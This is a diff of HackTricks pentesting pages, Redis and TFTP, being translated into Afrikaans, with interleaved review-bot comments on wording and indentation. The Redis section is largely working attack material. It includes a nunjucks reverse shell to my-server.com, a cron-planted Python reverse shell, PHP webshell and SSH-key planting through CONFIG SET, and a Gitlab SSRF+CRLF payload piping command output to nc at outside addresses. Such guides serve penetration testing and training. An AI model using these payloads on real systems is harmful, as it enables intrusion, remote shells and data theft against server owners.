You can find if anyone is used in the output of the command `info` inside the "Keyspace" chunk: +Binne Redis is die **databasisse nommers wat begin by 0**. Jy kan vind of enigeen gebruik word in die uitset van die opdrag `info` binne die "Keyspace" blok: ![](<../.gitbook/assets/image (315).png>) -Or you can just get all the **keyspaces** (databases) with: - +Of jy kan net al die **keyspaces** (databasisse) kry met: ``` INFO keyspace ``` - -In that example the **database 0 and 1** are being used. **Database 0 contains 4 keys and database 1 contains 1**. By default Redis will use database 0. In order to dump for example database 1 you need to do: - +In daardie voorbeeld word die **databasis 0 en 1** gebruik. **Databasis 0 bevat 4 sleutels en databasis 1 bevat 1**. Standaard gebruik Redis databasis 0. Om byvoorbeeld databasis 1 te dump, moet jy die volgende doen: ```bash SELECT 1 [ ... Indicate the database ... ] -KEYS * +KEYS * [ ... Get Keys ... ] GET [ ... Get Key ... ] ``` +In die geval dat jy die volgende fout kry `-WRONGTYPE Operasie teen 'n sleutel wat die verkeerde soort waarde bevat` terwyl jy `GET ` uitvoer, is dit omdat die sleutel dalk iets anders as 'n string of 'n heelgetal is en 'n spesiale operator vereis om dit te vertoon. -In case you get the follwing error `-WRONGTYPE Operation against a key holding the wrong kind of value` while running `GET ` it's because the key may be something else than a string or an integer and requires a special operator to display it. - -To know the type of the key, use the `TYPE` command, example below for list and hash keys. - +Om die tipe van die sleutel te weet, gebruik die `TYPE` bevel, voorbeeld hieronder vir lys- en hashsleutels. ``` TYPE [ ... Type of the Key ... ] 
@@ -154,38 +135,34 @@ LRANGE 0 -1 HGET [ ... Get hash item ... ] ``` - -**Dump the database with npm**[ **redis-dump**](https://www.npmjs.com/package/redis-dump) **or python** [**redis-utils**](https://pypi.org/project/redis-utils/) +**Dump die databasis met npm** [**redis-dump**](https://www.npmjs.com/package/redis-dump) **of python** [**redis-utils**](https://pypi.org/project/redis-utils/)
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutbeloningsjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige hacking-wêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en kritieke platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! ## Redis RCE -### Interactive Shell - -[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) can automatically get an interactive shell or a reverse shell in Redis(<=5.0.5). +### Interaktiewe Skulp +[**redis-rogue-server**](https://github.com/n0b0dyCN/redis-rogue-server) kan outomaties 'n interaktiewe skulp of 'n omgekeerde skulp in Redis (<=5.0.5) kry. ``` ./redis-rogue-server.py --rhost --lhost ``` - ### PHP Webshell -Info from [**here**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html). You must know the **path** of the **Web site folder**: - +Inligting vanaf [**hier**](https://web.archive.org/web/20191201022931/http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html). 
Jy moet die **pad** van die **Webwerf vouer** weet: ``` root@Urahara:~# redis-cli -h 10.85.0.52 10.85.0.52:6379> config set dir /usr/share/nginx/html 
@@ -197,59 +174,55 @@ OK 10.85.0.52:6379> save OK ``` +As die webshell toegang uitsondering gee, kan jy die databasis leegmaak na rugsteun en weer probeer, onthou om die databasis te herstel. -​If the webshell access exception, you can empty the database after backup and try again, remember to restore the database. +### Sjabloon Webshell -### Template Webshell - -Like in the previous section you could also overwrite some html template file that is going to be interpreted by a template engine and obtain a shell. - -For example, following [**this writeup**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/), you can see that the attacker injected a **rev shell in an html** interpreted by the **nunjucks template engine:** +Soos in die vorige afdeling kan jy ook 'n paar html-sjabloonlêers oorskryf wat deur 'n sjabloon-enjin geïnterpreteer gaan word en 'n shell verkry. +Byvoorbeeld, volgens [**hierdie writeup**](https://www.neteye-blog.com/2022/05/cyber-apocalypse-ctf-2022-red-island-writeup/), kan jy sien dat die aanvaller 'n **rev shell in 'n html** ingespuit het wat deur die **nunjucks sjabloon-enjin** geïnterpreteer word: ```javascript {{ ({}).constructor.constructor( - "var net = global.process.mainModule.require('net'), - cp = global.process.mainModule.require('child_process'), - sh = cp.spawn('sh', []); - var client = new net.Socket(); - client.connect(1234, 'my-server.com', function(){ - client.pipe(sh.stdin); - sh.stdout.pipe(client); - sh.stderr.pipe(client); - });" +"var net = global.process.mainModule.require('net'), +cp = global.process.mainModule.require('child_process'), +sh = cp.spawn('sh', []); +var client = new net.Socket(); +client.connect(1234, 'my-server.com', function(){ +client.pipe(sh.stdin); +sh.stdout.pipe(client); +sh.stderr.pipe(client); +});" )()}} ``` - {% hint style="warning" %} -Note that **several template engines cache** the templates in **memory**, so even if you overwrite them, the new one **won't be 
executed**. In this cases, either the developer left the automatic reload active or you need to do a DoS over the service (and expect that it will be relaunched automatically). +Let daarop dat **verskeie sjabloondraaiers die sjablone in die geheue stoor**, so selfs al oorskryf jy hulle, sal die nuwe een **nie uitgevoer word nie**. In hierdie gevalle het die ontwikkelaar óf die outomatiese herlaai aktief gelaat óf jy moet 'n DoS oor die diens doen (en verwag dat dit outomaties herlaai sal word). {% endhint %} ### SSH -Example [from here](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) +Voorbeeld [van hier](https://blog.adithyanak.com/oscp-preparation-guide/enumeration) -Please be aware **`config get dir`** result can be changed after other manually exploit commands. Suggest to run it first right after login into Redis. In the output of **`config get dir`** you could find the **home** of the **redis user** (usually _/var/lib/redis_ or _/home/redis/.ssh_), and knowing this you know where you can write the `authenticated_users` file to access via ssh **with the user redis**. If you know the home of other valid user where you have writable permissions you can also abuse it: +Wees bewus dat die resultaat van **`config get dir`** kan verander na ander handmatige uitbuitingsopdragte. Stel voor om dit eerste uit te voer direk nadat jy in Redis ingeteken het. In die uitset van **`config get dir`** kan jy die **tuiste** van die **redis-gebruiker** vind (gewoonlik _/var/lib/redis_ of _/home/redis/.ssh_), en deur dit te weet, weet jy waar jy die `authenticated_users`-lêer kan skryf om toegang te verkry via ssh **met die gebruiker redis**. As jy die tuiste van 'n ander geldige gebruiker ken waar jy skryfregte het, kan jy dit ook misbruik: -1. Generate a ssh public-private key pair on your pc: **`ssh-keygen -t rsa`** -2. Write the public key to a file : **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** -3. 
Import the file into redis : **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** -4. Save the public key to the **authorized\_keys** file on redis server: +1. Genereer 'n ssh openbare-privaat sleutelpaar op jou rekenaar: **`ssh-keygen -t rsa`** +2. Skryf die openbare sleutel na 'n lêer: **`(echo -e "\n\n"; cat ~/id_rsa.pub; echo -e "\n\n") > spaced_key.txt`** +3. Importeer die lêer na Redis: **`cat spaced_key.txt | redis-cli -h 10.85.0.52 -x set ssh_key`** +4. Stoor die openbare sleutel in die **authorized\_keys**-lêer op die Redis-bediener: - ``` - root@Urahara:~# redis-cli -h 10.85.0.52 - 10.85.0.52:6379> config set dir /var/lib/redis/.ssh - OK - 10.85.0.52:6379> config set dbfilename "authorized_keys" - OK - 10.85.0.52:6379> save - OK - ``` -5. Finally, you can **ssh** to the **redis server** with private key : **ssh -i id\_rsa redis@10.85.0.52** +``` +root@Urahara:~# redis-cli -h 10.85.0.52 +10.85.0.52:6379> config set dir /var/lib/redis/.ssh +OK +10.85.0.52:6379> config set dbfilename "authorized_keys" +OK +10.85.0.52:6379> save +OK +``` +5. Uiteindelik kan jy **ssh** na die **Redis-bediener** met die privaat sleutel: **ssh -i id\_rsa redis@10.85.0.52** -**This technique is automated here:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) +**Hierdie tegniek is outomaties hier beskikbaar:** [https://github.com/Avinash-acid/Redis-Server-Exploit](https://github.com/Avinash-acid/Redis-Server-Exploit) ### Crontab - ``` root@Urahara:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1 OK 
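Review bot: the fenced block under step 4 of the SSH list lost its four-space indentation, so it no longer belongs to step 4 and the ordered list is split in two around it; re-indent the fence and its lines as the removed side had them (`    root@Urahara:~# redis-cli -h 10.85.0.52`). The same applies to the body of the nunjucks payload string, which was de-indented for no reason. While touching this paragraph: the prose still tells the reader to write an `authenticated_users` file, but step 4 (correctly) writes `authorized_keys`; fix the prose to `authorized_keys`. Minor wording: the hint uses "sjabloondraaiers" where the paragraph above uses "sjabloon-enjin", and "Stel voor om dit eerste uit te voer" is a fragment; "Dit word voorgestel om dit eerste uit te voer" reads better.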
@@ -260,40 +233,38 @@ OK root@Urahara:~# redis-cli -h 10.85.0.52 save OK ``` +Die laaste voorbeeld is vir Ubuntu, vir **Centos**, moet die bogenoemde bevel wees: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` -The last example is for Ubuntu, for **Centos**, the above command should be: `redis-cli -h 10.85.0.52 config set dir /var/spool/cron/` +Hierdie metode kan ook gebruik word om bitcoin te verdien: [yam](https://www.v2ex.com/t/286981#reply14) -This method can also be used to earn bitcoin :[yam](https://www.v2ex.com/t/286981#reply14) +### Laai Redis Module -### Load Redis Module +1. Volg die instruksies vanaf [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) om 'n Redis-module te **kompileer om willekeurige bevele uit te voer**. +2. Jy benodig dan 'n manier om die gekompileerde module **op te laai**. +3. **Laai die opgelaaide module** tydens uitvoering met `MODULE LOAD /path/to/mymodule.so`. +4. **Lys gelaai modules** om te bevestig dat dit korrek gelaai is: `MODULE LIST`. +5. **Voer bevele uit**: -1. Following the instructions from [https://github.com/n0b0dyCN/RedisModules-ExecuteCommand](https://github.com/n0b0dyCN/RedisModules-ExecuteCommand) you can **compile a redis module to execute arbitrary commands**. -2. Then you need some way to **upload the compiled** module -3. **Load the uploaded module** at runtime with `MODULE LOAD /path/to/mymodule.so` -4. **List loaded modules** to check it was correctly loaded: `MODULE LIST` -5. **Execute** **commands**: +``` +127.0.0.1:6379> system.exec "id" +"uid=0(root) gid=0(root) groups=0(root)\n" +127.0.0.1:6379> system.exec "whoami" +"root\n" +127.0.0.1:6379> system.rev 127.0.0.1 9999 +``` +6. Ontlaai die module wanneer jy wil: `MODULE UNLOAD mymodule` - ``` - 127.0.0.1:6379> system.exec "id" - "uid=0(root) gid=0(root) groups=0(root)\n" - 127.0.0.1:6379> system.exec "whoami" - "root\n" - 127.0.0.1:6379> system.rev 127.0.0.1 9999 - ``` -6. 
Unload the module whenever you want: `MODULE UNLOAD mymodule` +### LUA sandboks omseil -### LUA sandbox bypass +[**Hier**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) kan jy sien dat Redis die bevel **EVAL** gebruik om **Lua-kode in 'n sandboks** uit te voer. In die gekoppelde pos kan jy sien **hoe om dit te misbruik** deur die **dofile**-funksie te gebruik, maar [blykbaar](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) is dit nie meer moontlik nie. In elk geval, as jy die Lua-sandboks kan **omseil**, kan jy willekeurige bevele op die stelsel uitvoer. Daarbenewens kan jy van dieselfde pos enkele **opsies gebruik om DoS** te veroorsaak. -[**Here**](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html) you can see that Redis uses the command **EVAL** to execute **Lua code sandboxed**. In the linked post you can see **how to abuse it** using the **dofile** function, but [apparently](https://stackoverflow.com/questions/43502696/redis-cli-code-execution-using-eval) this isn't no longer possible. Anyway, if you can **bypass the Lua** sandbox you could **execute arbitrary** commands on the system. Also, from the same post you can see some **options to cause DoS**. - -Some **CVEs to escape from LUA**: +Sommige **CVE's om uit LUA te ontsnap**: * [https://github.com/aodsec/CVE-2022-0543](https://github.com/aodsec/CVE-2022-0543) -### Master-Slave Module - -​The master redis all operations are automatically synchronized to the slave redis, which means that we can regard the vulnerability redis as a slave redis, connected to the master redis which our own controlled, then we can enter the command to our own redis. 
+### Meester-Slaaf Module +Die meester-redis se alle operasies word outomaties gesinkroniseer na die slaaf-redis, wat beteken dat ons die kwesbaarheid-redis as 'n slaaf-redis kan beskou, wat verbind is met die meester-redis wat ons eie beheer word, dan kan ons die bevel in ons eie redis invoer. ``` master redis : 10.85.0.51 (Hacker's Server) slave redis : 10.85.0.52 (Target Vulnerability Server) @@ -305,11 +276,9 @@ redis-cli -h 10.85.0.51 -p 6379 set mykey hello set mykey2 helloworld ``` +## SSRF praat met Redis -## SSRF talking to Redis - -If you can send **clear text** request **to Redis**, you can **communicate with it** as Redis will read line by line the request and just respond with errors to the lines it doesn't understand: - +As jy 'n **duidelike teksversoek** na **Redis** kan stuur, kan jy **met dit kommunikeer** omdat Redis die versoek lyn vir lyn sal lees en net met foute sal antwoord op die lyne wat dit nie verstaan nie: ``` -ERR wrong number of arguments for 'get' command -ERR unknown command 'Host:' 
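Review bot: in the "Laai Redis Module" list the fenced block under step 5 was de-indented in the same way as the SSH list above, so step 6 is detached from the list; restore the indentation. "Lys gelaai modules" should be "Lys gelaaide modules". The Master-Slave paragraph is ungrammatical: "die kwesbaarheid-redis ... wat verbind is met die meester-redis wat ons eie beheer word, dan kan ons die bevel in ons eie redis invoer" reads better as "die kwesbare redis as 'n slaaf-redis beskou wat aan 'n meester-redis onder ons beheer gekoppel is; dan kan ons die opdragte op ons eie redis invoer".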
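Review bot: "'n duidelike teksversoek" mistranslates "clear text", which here means unencrypted, not clearly worded; suggest "'n versoek in platteks (ongeënkripteer) na **Redis**". The rest of the SSRF paragraph is fine.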
@@ -319,55 +288,50 @@ If you can send **clear text** request **to Redis**, you can **communicate with -ERR unknown command 'Cache-Control:' -ERR unknown command 'Connection:' ``` +Daarom, as jy 'n **SSRF vuln** in 'n webwerf vind en jy kan sekere **headers** (miskien met 'n CRLF vuln) of **POST parameters** **beheer**, sal jy in staat wees om willekeurige opdragte na Redis te stuur. -Therefore, if you find a **SSRF vuln** in a website and you can **control** some **headers** (maybe with a CRLF vuln) or **POST parameters**, you will be able to send arbitrary commands to Redis. +### Voorbeeld: Gitlab SSRF + CRLF na Shell -### Example: Gitlab SSRF + CRLF to Shell - -In **Gitlab11.4.7** were discovered a **SSRF** vulnerability and a **CRLF**. The **SSRF** vulnerability was in the **import project from URL functionality** when creating a new project and allowed to access arbitrary IPs in the form \[0:0:0:0:0:ffff:127.0.0.1] (this will access 127.0.0.1), and the **CRLF** vuln was exploited just **adding %0D%0A** characters to the **URL**. - -Therefore, it was possible to **abuse these vulnerabilities to talk to the Redis instance** that **manages queues** from **gitlab** and abuse those queues to **obtain code execution**. The Redis queue abuse payload is: +In **Gitlab11.4.7** is 'n **SSRF**-kwesbaarheid en 'n **CRLF** ontdek. Die **SSRF**-kwesbaarheid was in die **importeer projek van URL-funksionaliteit** tydens die skep van 'n nuwe projek en het toegang tot willekeurige IP-adresse in die vorm \[0:0:0:0:0:ffff:127.0.0.1] (dit sal toegang tot 127.0.0.1 gee) moontlik gemaak, en die **CRLF**-vuln is uitgebuit deur net **%0D%0A** karakters by die **URL** te voeg. +Daarom was dit moontlik om hierdie kwesbaarhede te **misbruik om met die Redis-instantie te kommunikeer** wat **queues bestuur** vanaf **gitlab** en daardie queues te misbruik om **kodes uit te voer**. 
Die Redis queue misbruik payload is: ``` - multi - sadd resque:gitlab:queues system_hook_push - lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" - exec +multi +sadd resque:gitlab:queues system_hook_push +lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}" +exec ``` - -And the **URL encode** request **abusing SSRF** and **CRLF** to execute a `whoami` and send back the output via `nc` is: - +En die **URL-kodering** versoek **misbruik SSRF** en **CRLF** om 'n `whoami` uit te voer en die uitset terug te stuur via `nc` is: ``` git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git ``` - -_For some reason (as for the author of_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _where this info was took from) the exploitation worked with the `git` 
scheme and not with the `http` scheme._ +_Vir 'n rede (soos vir die skrywer van_ [_https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/_](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/) _waar hierdie inligting vandaan kom) het die uitbuiting gewerk met die `git` skema en nie met die `http` skema nie._
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking Insigtings**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hackering ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige hackering wêreld deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste Aankondigings**\ +Bly ingelig met die nuutste foutjagte wat begin en kritieke platform opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hackering van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hackeringstruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
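Review bot: several wording problems in the Gitlab section and the banner. "om **kodes uit te voer**" should be "om **kode-uitvoering te verkry**" (code execution, not "codes"); "_Vir 'n rede_" should be "_Om een of ander rede_"; "Hacking Insigtings" is a typo for "Hacking-insigte"; "hackering"/"hackeringstruuks" is inconsistent with "hacking"/"hacktruuks" used in the other files of this same patch, pick one. Separately, the payload shown in the first block runs `whoami | nc 192.241.233.143 80` while the URL-encoded request below carries `cat /flag | nc 127.0.0.1 2222`; the source has the same mismatch, so either align them or state that they are two different examples.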
diff --git a/network-services-pentesting/69-udp-tftp.md b/network-services-pentesting/69-udp-tftp.md index b967d7a37..24abe855f 100644 --- a/network-services-pentesting/69-udp-tftp.md +++ b/network-services-pentesting/69-udp-tftp.md @@ -1,45 +1,38 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# Basic Information +# Basiese Inligting -**Trivial File Transfer Protocol (TFTP)** is a straightforward protocol used on **UDP port 69** that allows file transfers without needing authentication. Highlighted in **RFC 1350**, its simplicity means it lacks key security features, leading to limited use on the public Internet. However, **TFTP** is extensively utilized within large internal networks for distributing **configuration files** and **ROM images** to devices such as **VoIP handsets**, thanks to its efficiency in these specific scenarios. +**Trivial File Transfer Protocol (TFTP)** is 'n eenvoudige protokol wat op **UDP-poort 69** gebruik word om lêeroordragte sonder verifikasie moontlik te maak. Dit word uitgelig in **RFC 1350**, maar weens sy eenvoud ontbreek dit aan belangrike sekuriteitskenmerke, wat lei tot beperkte gebruik op die openbare internet. Nietemin word **TFTP** wyd gebruik binne groot interne netwerke om **konfigurasie-lêers** en **ROM-beelde** na toestelle soos **VoIP-handsets** te versprei, dankie aan sy doeltreffendheid in hierdie spesifieke scenario's. -**TODO**: Provide information about what is a Bittorrent-tracker (Shodan identifies this port with that name). If you have more info about this let us know for example in the [**HackTricks telegram group**](https://t.me/peass) (or in a github issue in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)). - -**Default Port:** 69/UDP +**TODO**: Verskaf inligting oor wat 'n Bittorrent-tracker is (Shodan identifiseer hierdie poort met daardie naam). As jy meer inligting hieroor het, laat ons weet byvoorbeeld in die [**HackTricks telegram-groep**](https://t.me/peass) (of in 'n github-uitgawe in [PEASS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)). 
+**Verstekpoort:** 69/UDP ``` PORT STATE SERVICE REASON 69/udp open tftp script-set ``` +# Opname -# Enumeration - -TFTP doesn't provide directory listing so the script `tftp-enum` from `nmap` will try to brute-force default paths. - +TFTP verskaf nie 'n lys van gids nie, so die skrip `tftp-enum` van `nmap` sal probeer om standaard paaie met 'n brute-force aanval te agterhaal. ```bash nmap -n -Pn -sU -p69 -sV --script tftp-enum ``` +## Aflaai/Oplaai -## Download/Upload - -You can use Metasploit or Python to check if you can download/upload files: - +Jy kan Metasploit of Python gebruik om te kyk of jy lêers kan aflaai/oplaai: ```bash msf5> auxiliary/admin/tftp/tftp_transfer_util ``` @@ -50,7 +43,6 @@ client = tftpy.TftpClient(, ) client.download("filename in server", "/tmp/filename", timeout=5) client.upload("filename to upload", "/local/path/file", timeout=5) ``` - ## Shodan * `port:69` @@ -58,16 +50,14 @@ client.upload("filename to upload", "/local/path/file", timeout=5)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/7-tcp-udp-pentesting-echo.md b/network-services-pentesting/7-tcp-udp-pentesting-echo.md index 234edbca9..fd8eb5b31 100644 --- a/network-services-pentesting/7-tcp-udp-pentesting-echo.md +++ b/network-services-pentesting/7-tcp-udp-pentesting-echo.md @@ -1,47 +1,49 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of 